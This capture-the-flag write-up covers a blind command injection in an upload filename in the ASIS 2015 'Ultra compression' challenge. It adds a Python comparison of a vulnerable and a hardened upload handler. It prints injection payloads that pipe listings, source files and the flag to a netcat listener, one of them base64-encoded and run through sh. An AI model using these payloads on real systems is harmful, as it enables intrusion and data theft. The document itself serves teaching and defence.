ASIS 2015 Finals: Ultra compression (web125)


This challenge was solved by, and the write-up was written by, teammates nguyen and akg.

Testing showed that the filename of the uploaded file is vulnerable to blind command injection.

Set up a host listening on a port and inject a command, e.g.: filename.txt; ls |nc ip port

To copy the source, use: find .. -iname '*gz'|xargs cat|nc ip port. After analyzing it, we have the exploit:

~  echo "cat /home/asis/flag.txt | nc ip port" | base64
<base64string>
~ a.txt| echo <base64string> | base64 -d | sh
ASIS{72a126946e40f67a04d926dd4786ff15}
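
The write-up does not show the service's source, so the following is an added example and not the challenge's code: it assumes a handler that passes the client-supplied filename to a shell `gzip` command, and contrasts it with a version that validates the name, stores the file under a server-chosen name and compresses in-process. The function names, the allow-list and the marker filename `INJECTED` are hypothetical.

```python
import gzip
import os
import re
import subprocess
import tempfile
import uuid

# Allow-list for the client-supplied name: no spaces, ';', '|', '$', quotes or '/'.
ALLOWED = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")

def compress_vulnerable(upload_dir, client_name, data):
    """Assumed flaw: the client's filename is concatenated into a shell command."""
    with open(os.path.join(upload_dir, os.path.basename(client_name)), "wb") as f:
        f.write(data)
    # /bin/sh parses ';' and '|' inside client_name as syntax, not as a filename.
    subprocess.run("gzip -f " + client_name, shell=True, cwd=upload_dir,
                   stderr=subprocess.DEVNULL)

def compress_hardened(upload_dir, client_name, data):
    """Validate the name, store under a server-chosen name, compress in-process."""
    if not ALLOWED.fullmatch(client_name):
        raise ValueError("rejected filename: %r" % client_name)
    stored = uuid.uuid4().hex + ".gz"  # the client name never reaches the filesystem
    with gzip.open(os.path.join(upload_dir, stored), "wb") as f:
        f.write(data)
    return stored

def demo():
    name = "a.txt; touch INJECTED"  # constructed input with a harmless marker command
    with tempfile.TemporaryDirectory() as d:
        compress_vulnerable(d, name, b"hello")
        injected = os.path.exists(os.path.join(d, "INJECTED"))
    with tempfile.TemporaryDirectory() as d:
        try:
            compress_hardened(d, name, b"hello")
            rejected = False
        except ValueError:
            rejected = True
        stored = compress_hardened(d, "report.txt", b"hello")
        with gzip.open(os.path.join(d, stored), "rb") as f:
            roundtrip = f.read()
        clean = sorted(os.listdir(d)) == [stored]
    return injected, rejected, roundtrip, clean

if __name__ == "__main__":
    print(demo())
```

Because the injection is blind, the HTTP response looks the same either way; on the server side the reliable signal is the upload handler's process spawning child processes it has no reason to start.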
